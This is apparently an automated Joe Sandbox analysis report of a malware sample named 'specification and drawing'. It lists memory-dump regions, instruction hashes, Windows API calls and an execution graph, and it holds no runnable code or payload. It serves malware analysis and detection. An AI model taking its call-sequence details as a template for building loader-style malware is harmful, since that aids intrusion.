                                                                                                          • API String ID: 947044025-0
                                                                                                          • Opcode ID: d0876cf5b4f4d89839ea8b8af71f028ba56434280f37790b8a9f38d1f9f68beb
                                                                                                          • Instruction ID: db4b36da5d73eb1cff02c8261b41f85d9b358e429d3e6e348c19b7cce3e9840d
                                                                                                          • Opcode Fuzzy Hash: d0876cf5b4f4d89839ea8b8af71f028ba56434280f37790b8a9f38d1f9f68beb
                                                                                                          • Instruction Fuzzy Hash: 73113AB19003498FDB20DFAAC4457DEFBF4EF88724F248419D519A7240CB79A944CF95
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 013EB51E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID:
                                                                                                          • API String ID: 4139908857-0
                                                                                                          • Opcode ID: 3a03218c419d379f120bb8602fee3bd8d34d98a467a6f37231e7a583257522e2
                                                                                                          • Instruction ID: 84d441407e39b888c609ca1a8a889c462e2323c9c20b083db7c839bab50fe390
                                                                                                          • Opcode Fuzzy Hash: 3a03218c419d379f120bb8602fee3bd8d34d98a467a6f37231e7a583257522e2
                                                                                                          • Instruction Fuzzy Hash: 95110FB6C00349CFDB10CF9AD444B9EFBF4AB88724F14841AD528A7250D379A545CFA1
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071DC45D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: d30bbafd8a25086852f378cd97f7e21d08b64e83b294dd226a1c911705b80963
                                                                                                          • Instruction ID: e0d71cb006f7cb5e2ecd58a0c1be1b98ba5b9779f21780fabe1fdb178f2d741f
                                                                                                          • Opcode Fuzzy Hash: d30bbafd8a25086852f378cd97f7e21d08b64e83b294dd226a1c911705b80963
                                                                                                          • Instruction Fuzzy Hash: B91136B5800309DFDB10CF99C948BEEBBF8EB48320F208419E518B7240C3B5A944CFA5
                                                                                                          APIs
                                                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 071DC45D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePost
                                                                                                          • String ID:
                                                                                                          • API String ID: 410705778-0
                                                                                                          • Opcode ID: cd6c31f5863c0b605cd4de729c559cb8d14a8b9e47cb34ed6b5851cd445caa61
                                                                                                          • Instruction ID: fc6a65b18ed02d4e9c0ea70b3712478e277331930ea0f0e9648229119bb10aac
                                                                                                          • Opcode Fuzzy Hash: cd6c31f5863c0b605cd4de729c559cb8d14a8b9e47cb34ed6b5851cd445caa61
                                                                                                          • Instruction Fuzzy Hash: 5111F5B58003499FDB10DF9AC949BEEBBF8EB48720F108819E558A7641C375A944CFA5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 073285242d9b0a19b37eb9ab8eddbaef263fd469cd4f7d8e109b9f87cf0e14e9
                                                                                                          • Instruction ID: 74b6df559df3f3d6355d144c773b23a8e48d2326cf423cc3d33658027e09d750
                                                                                                          • Opcode Fuzzy Hash: 073285242d9b0a19b37eb9ab8eddbaef263fd469cd4f7d8e109b9f87cf0e14e9
                                                                                                          • Instruction Fuzzy Hash: 272178B2100204DFDB05DF45C9C4B6ABFE5FB94324F20C1ADE9490B216C736E406CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 77fb156377976e0703e334d84f5194841340bca4a836db7c3725c26b6d36258b
                                                                                                          • Instruction ID: 648097d6dcdbd2c758e38590b7957dca955e8a0ac63a575d7e5b60c49faa91a5
                                                                                                          • Opcode Fuzzy Hash: 77fb156377976e0703e334d84f5194841340bca4a836db7c3725c26b6d36258b
                                                                                                          • Instruction Fuzzy Hash: 22212275604300EFDB15DF54D9C0B2ABBA1FB84314F20C5ADEA8A4B652C77AD407CB61
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 73c349cffddc1513b6bcf625fc4b64509b69a65a44a72aeed6ad7812bc99f7a2
                                                                                                          • Instruction ID: cc8a93ef239e74187c86b489d98896db782078ac3c3281093da533c50278bb04
                                                                                                          • Opcode Fuzzy Hash: 73c349cffddc1513b6bcf625fc4b64509b69a65a44a72aeed6ad7812bc99f7a2
                                                                                                          • Instruction Fuzzy Hash: 52216B79504300EFDB85DF94D5C1F2ABBA1FB84324F20C5ADDA894B652C77AD406CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                          • Instruction ID: 37773c1dfd9fe09809c69f411598a674389811055cfedbd0cab4c583371addf3
                                                                                                          • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                                                                          • Instruction Fuzzy Hash: C81103B6404280CFCB06CF44D5C4B56BFB1FB94324F24C2A9D8490B257C33AE456CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                          • Instruction ID: 6b9fa7a16368fc27d22098774b36aef4b88fd3ea63273d26bc633af94e151531
                                                                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                          • Instruction Fuzzy Hash: 3311BB7A504280DFCB42CF54C5C0B15BBA1FB84224F24C6AED9894B6A6C33AD40ACBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165399802.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10fd000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                          • Instruction ID: f98add7be80ae83182619be1c0029367d54aa9c9260fed6697d1433723725d59
                                                                                                          • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                                                                          • Instruction Fuzzy Hash: 1711DD75504280CFCB16CF54D5C4B15FFA2FB84314F24C6AEE9494BA56C33AD40ACBA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bb2efa0cd7ce5c8a5ae486ebca3e9d2f4677aa172219b4fba4d7093978e31419
                                                                                                          • Instruction ID: 28980fe6b9ffa83e5c9086c21cae44172468b4314ec5b9dbfea97f5c7a198d24
                                                                                                          • Opcode Fuzzy Hash: bb2efa0cd7ce5c8a5ae486ebca3e9d2f4677aa172219b4fba4d7093978e31419
                                                                                                          • Instruction Fuzzy Hash: 7201F7714443849EF7104BAACD8876ABFD8FF80324F18C45AEEC84A192E6789840C771
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2165364135.00000000010ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 010ED000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10ed000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 978817798460ec36c2e7eca1b72e676838a839a537f454ca0feb90a147ea0dc4
                                                                                                          • Instruction ID: 298a7b2e4ff54d09ed5614a0f49f3e85a4e5e3313c03047964bc3b1a20218224
                                                                                                          • Opcode Fuzzy Hash: 978817798460ec36c2e7eca1b72e676838a839a537f454ca0feb90a147ea0dc4
                                                                                                          • Instruction Fuzzy Hash: C9F0C2724043849EE7108B1ACD88B66FFD8EB80634F18C45AED880A282D2789844CB71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 512ab405f670f12488ddd83eea47144e909794c610d2ecd931b8de6b7ad94ef6
                                                                                                          • Instruction ID: 9ce3bb6d4cf2126a75806d88813eb836c57ed33e719f0157a233e7eee29d96dc
                                                                                                          • Opcode Fuzzy Hash: 512ab405f670f12488ddd83eea47144e909794c610d2ecd931b8de6b7ad94ef6
                                                                                                          • Instruction Fuzzy Hash: DFD19BB0B013128FDB1ADB79C450BAEBBF6AF89701F148469D1469B2D0CB34ED09CB51
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8e4ebf5cdda0489849bbecb78c272e6bfa67e10fd468336697be58016ae4a9a2
                                                                                                          • Instruction ID: 4aca092ef3778836008ed8f74e7a575e8d9b7de976a844a4387f21602d16dcbe
                                                                                                          • Opcode Fuzzy Hash: 8e4ebf5cdda0489849bbecb78c272e6bfa67e10fd468336697be58016ae4a9a2
                                                                                                          • Instruction Fuzzy Hash: ACE109B4E1025A8FDB14DFA9C590AAEBBF2FF49304F248269D414A7395C7309D82CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d6f09d9e50ffba434db48a0b8e4d725a987a4943dd471057e5f6ab1f9ac6de19
                                                                                                          • Instruction ID: ed41a5367ba838881670cdbca436fcb3bd209cae4b70cafed3fc1b6ed78e485e
                                                                                                          • Opcode Fuzzy Hash: d6f09d9e50ffba434db48a0b8e4d725a987a4943dd471057e5f6ab1f9ac6de19
                                                                                                          • Instruction Fuzzy Hash: C6E1F9B4E1025A8FDB14DFA9C590AAEBBF2FF49304F248269D514AB355D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65ecffdd1ab9f0015c8a29df11b4c29e7ce33870ce91779942e186f354e612a4
                                                                                                          • Instruction ID: 64f2b42399e4ad89fb8c36d31d8129f7caf8fbe5f97091b8b3868a289142dcd9
                                                                                                          • Opcode Fuzzy Hash: 65ecffdd1ab9f0015c8a29df11b4c29e7ce33870ce91779942e186f354e612a4
                                                                                                          • Instruction Fuzzy Hash: FCE119B4E1025A8FDB14DF99C590AAEBBF2FF49304F248159D414AB395D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a2ad317e3a6f3df77fc2190543bd7aaa91aaeaefd0c27b2fabd25f85fb2c485d
                                                                                                          • Instruction ID: 7a7ba47560ef73e5f9389c2e1985622b4dfeef751a007b44e11069d4df0ce4e0
                                                                                                          • Opcode Fuzzy Hash: a2ad317e3a6f3df77fc2190543bd7aaa91aaeaefd0c27b2fabd25f85fb2c485d
                                                                                                          • Instruction Fuzzy Hash: 50E109B4E1025A8FDB14DFA9C590AAEBBF2FF89304F248259D514A7395D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 82cba19434735484fbbbe7e19377b071850cece044534d313c7c0e4f7832f8c1
                                                                                                          • Instruction ID: b840eea56e7af7b78f8f9b70913367a18067d9f0fa5fedd9184cb1aea106ab44
                                                                                                          • Opcode Fuzzy Hash: 82cba19434735484fbbbe7e19377b071850cece044534d313c7c0e4f7832f8c1
                                                                                                          • Instruction Fuzzy Hash: 8CE108B4E1025A8FDB14DFA9C590AAEBBF2FF89304F248259D514AB355D730AD42CF60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2174567286.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_13e0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e0e7e4d7b49f4396dfb4c506430c707d6c6abed9b34eb783a0526066aedd1f06
                                                                                                          • Instruction ID: 1e240642d4d3c11d28fa578d7752336a6993fb03b6b372ae0d676dedea74a166
                                                                                                          • Opcode Fuzzy Hash: e0e7e4d7b49f4396dfb4c506430c707d6c6abed9b34eb783a0526066aedd1f06
                                                                                                          • Instruction Fuzzy Hash: 77A16E32E0032A8FCF05DFA8C8485EEBBF6BF85304B15456AE905AB2A5DB71D955CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 88298417ad12907742eb9aacfa143846ec29551237181616a5ff95561050071a
                                                                                                          • Instruction ID: c67326f27619afd3fb9e3c93c29b595dbd5b4cb2fd493ff9340c9a2f7db5525c
                                                                                                          • Opcode Fuzzy Hash: 88298417ad12907742eb9aacfa143846ec29551237181616a5ff95561050071a
                                                                                                          • Instruction Fuzzy Hash: 55A12974E00209DFDB04EFB8D4947AEBBF6AF88300F108569E505EB395DA35AD81CB95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 45fa91067191248484623359f150d49d74588bd053c9b760308d290b1f88794e
                                                                                                          • Instruction ID: 759a01bf4d02cc0deef34343baf24816d686b610d4378fb502ed951c4ec4112c
                                                                                                          • Opcode Fuzzy Hash: 45fa91067191248484623359f150d49d74588bd053c9b760308d290b1f88794e
                                                                                                          • Instruction Fuzzy Hash: 40C171B5E00659CFDB58CF6AC9846DDBBF2BF89301F14C1A9D809AB364DB305A858F50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a618565078f1a59096896bb7e8771765e773f8eb860eaf51af49f50e545b5b72
                                                                                                          • Instruction ID: 39fc8ba3efd2db7ab74a02eb6e9a3dea646463a6be7e1f2f2058e743646555a5
                                                                                                          • Opcode Fuzzy Hash: a618565078f1a59096896bb7e8771765e773f8eb860eaf51af49f50e545b5b72
                                                                                                          • Instruction Fuzzy Hash: 3061D971A2064A8FD748DFAAE84569ABFF2FBC8300F14D52AD504AB358DF745909DF40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2189405147.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7c50000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 651f2b27d88eb3a5469e7a2dcd3849354f15c224562fb7789227a302752e9036
                                                                                                          • Instruction ID: e572b8e6e57a2092ccd25cdb4a1525b37a0b2d931c434bc5361a84fc40f927eb
                                                                                                          • Opcode Fuzzy Hash: 651f2b27d88eb3a5469e7a2dcd3849354f15c224562fb7789227a302752e9036
                                                                                                          • Instruction Fuzzy Hash: 1361E871A2064A8FD748EFAAE84569ABFF2FBC8300F14D12AD504AB358DF745909DF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2188222604.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_71d0000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5c76adfc77a1f047b15efd88b73f472a75eb7a897f7229721908b6f59b7f3ff7
                                                                                                          • Instruction ID: 7ed5b6a41454fdf54b954b71750e7ad608dd2b93c4efe7f5933f22409e7dc17b
                                                                                                          • Opcode Fuzzy Hash: 5c76adfc77a1f047b15efd88b73f472a75eb7a897f7229721908b6f59b7f3ff7
                                                                                                          • Instruction Fuzzy Hash: 9851F7B1E1025A8BDB14CFA9C5806AEBBF2FF89305F248169D418A7355D7319D42CFA1

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:1.3%
                                                                                                          Dynamic/Decrypted Code Coverage:5%
                                                                                                          Signature Coverage:7.9%
                                                                                                          Total number of Nodes:139
                                                                                                          Total number of Limit Nodes:7
                                                                                                          execution_graph 86327 1102b60 LdrInitializeThunk 86184 42fd23 86185 42fd33 86184->86185 86186 42fd39 86184->86186 86189 42ed63 86186->86189 86188 42fd5f 86192 42ceb3 86189->86192 86191 42ed7e 86191->86188 86193 42cecd 86192->86193 86194 42cede RtlAllocateHeap 86193->86194 86194->86191 86195 4251a3 86197 4251bc 86195->86197 86196 425204 86203 42ec83 86196->86203 86197->86196 86200 425247 86197->86200 86202 42524c 86197->86202 86201 42ec83 RtlFreeHeap 86200->86201 86201->86202 86206 42cf03 86203->86206 86205 425214 86207 42cf1d 86206->86207 86208 42cf2e RtlFreeHeap 86207->86208 86208->86205 86328 42c153 86329 42c170 86328->86329 86332 1102df0 LdrInitializeThunk 86329->86332 86330 42c198 86332->86330 86333 424e13 86334 424e2f 86333->86334 86335 424e57 86334->86335 86336 424e6b 86334->86336 86337 42cb93 NtClose 86335->86337 86338 42cb93 NtClose 86336->86338 86339 424e60 86337->86339 86340 424e74 86338->86340 86343 42eda3 RtlAllocateHeap 86340->86343 86342 424e7f 86343->86342 86209 41a963 86210 41a9d5 86209->86210 86211 41a97b 86209->86211 86211->86210 86213 41e8e3 86211->86213 86214 41e909 86213->86214 86218 41ea00 86214->86218 86219 42fe53 86214->86219 86216 41e99e 86216->86218 86225 42c1a3 86216->86225 86218->86210 86220 42fdc3 86219->86220 86221 42ed63 RtlAllocateHeap 86220->86221 86222 42fe20 86220->86222 86223 42fdfd 86221->86223 86222->86216 86224 42ec83 RtlFreeHeap 86223->86224 86224->86222 86226 42c1bd 86225->86226 86229 1102c0a 86226->86229 86227 42c1e9 86227->86218 86230 1102c11 86229->86230 86231 1102c1f LdrInitializeThunk 86229->86231 86230->86227 86231->86227 86232 41b6c3 86233 41b707 86232->86233 86234 41b728 86233->86234 86236 42cb93 86233->86236 86237 42cbb0 86236->86237 86238 42cbc1 NtClose 86237->86238 86238->86234 86239 4140e3 86240 414109 86239->86240 86242 414133 86240->86242 86243 413e63 86240->86243 86246 42ce23 86243->86246 86247 42ce40 86246->86247 86250 1102c70 LdrInitializeThunk 86247->86250 86248 413e85 86248->86242 86250->86248 86251 401ca2 86252 401cc7 86251->86252 86255 4301f3 86252->86255 86258 42e833 86255->86258 86259 42e859 86258->86259 86270 4075f3 86259->86270 86261 42e86f 86262 401d8d 86261->86262 86273 41b4d3 86261->86273 86264 42e88e 86265 42e8a3 86264->86265 86288 42cf53 86264->86288 86284 4286e3 86265->86284 86268 42e8bd 86269 42cf53 ExitProcess 86268->86269 86269->86262 86291 416863 86270->86291 86272 407600 86272->86261 86274 41b4ff 86273->86274 86302 41b3c3 86274->86302 86277 41b544 86280 41b560 86277->86280 86282 42cb93 NtClose 86277->86282 86278 41b52c 86279 41b537 86278->86279 86281 42cb93 NtClose 86278->86281 86279->86264 86280->86264 86281->86279 86283 41b556 86282->86283 86283->86264 86285 428745 86284->86285 86287 428752 86285->86287 86313 418a03 86285->86313 86287->86268 86289 42cf70 86288->86289 86290 42cf81 ExitProcess 86289->86290 86290->86265 86292 416880 86291->86292 86294 416899 86292->86294 86295 42d5f3 86292->86295 86294->86272 86297 42d60d 86295->86297 86296 42d63c 86296->86294 86297->86296 86298 42c1a3 LdrInitializeThunk 86297->86298 86299 42d69c 86298->86299 86300 42ec83 RtlFreeHeap 86299->86300 86301 42d6b5 86300->86301 86301->86294 86303 41b4b9 86302->86303 86304 41b3dd 86302->86304 86303->86277 86303->86278 86308 42c243 86304->86308 86307 42cb93 NtClose 86307->86303 86309 42c25d 86308->86309 86312 11035c0 LdrInitializeThunk 86309->86312 86310 41b4ad 86310->86307 86312->86310 86315 418a2d 86313->86315 86314 418f3b 86314->86287 86315->86314 86321 414043 86315->86321 86317 418b5a 86317->86314 86318 42ec83 RtlFreeHeap 86317->86318 86319 418b72 86318->86319 86319->86314 86320 42cf53 ExitProcess 86319->86320 86320->86314 86325 414063 86321->86325 86323 4140cc 86323->86317 86324 4140c2 86324->86317 86325->86323 86326 41b7e3 RtlFreeHeap LdrInitializeThunk 86325->86326 86326->86324 86344 4143d3 86345 4143ed 86344->86345 86350 417ba3 86345->86350 86347 41440b 86348 41443f PostThreadMessageW 86347->86348 86349 414450 86347->86349 86348->86349 86351 417bc7 86350->86351 86352 417c03 LdrLoadDll 86351->86352 86353 417bce 86351->86353 86352->86353 86353->86347 86354 419158 86355 41915d 86354->86355 86356 42cb93 NtClose 86355->86356 86357 419162 86356->86357

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 187 417ba3-417bcc call 42f863 190 417bd2-417be0 call 42fe63 187->190 191 417bce-417bd1 187->191 194 417bf0-417c01 call 42e303 190->194 195 417be2-417bed call 430103 190->195 200 417c03-417c17 LdrLoadDll 194->200 201 417c1a-417c1d 194->201 195->194 200->201
                                                                                                          APIs
                                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C15
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Load
                                                                                                          • String ID:
                                                                                                          • API String ID: 2234796835-0
                                                                                                          • Opcode ID: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction ID: 29541c4c1cb86a97046c076e925ce7a07987024d856869177c45976850981732
                                                                                                          • Opcode Fuzzy Hash: 949b144e7e312fa6565cca895f987050310427acaaecf67f35788da544e7e580
                                                                                                          • Instruction Fuzzy Hash: 9A0125B5E0410DABDF10DBE5DC42FDEB3789B54308F0041A6E91897241F635EB588795

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 212 42cb93-42cbcf call 404923 call 42ddf3 NtClose
                                                                                                          APIs
                                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CBCA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Close
                                                                                                          • String ID:
                                                                                                          • API String ID: 3535843008-0
                                                                                                          • Opcode ID: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction ID: b76cf9a5bfc1315908a28204a52b0b2c49534136212ae28f732410f805bb8f60
                                                                                                          • Opcode Fuzzy Hash: 28e2915287915a0d41cf43200706cdba27b30fd896c2b55e5b9696efd4849daf
                                                                                                          • Instruction Fuzzy Hash: 91E04F762412547BD620AA6AEC41F9B776DDBC5714F404429FA0967141CAB4790187A4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 371 1102b60-1102b6c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
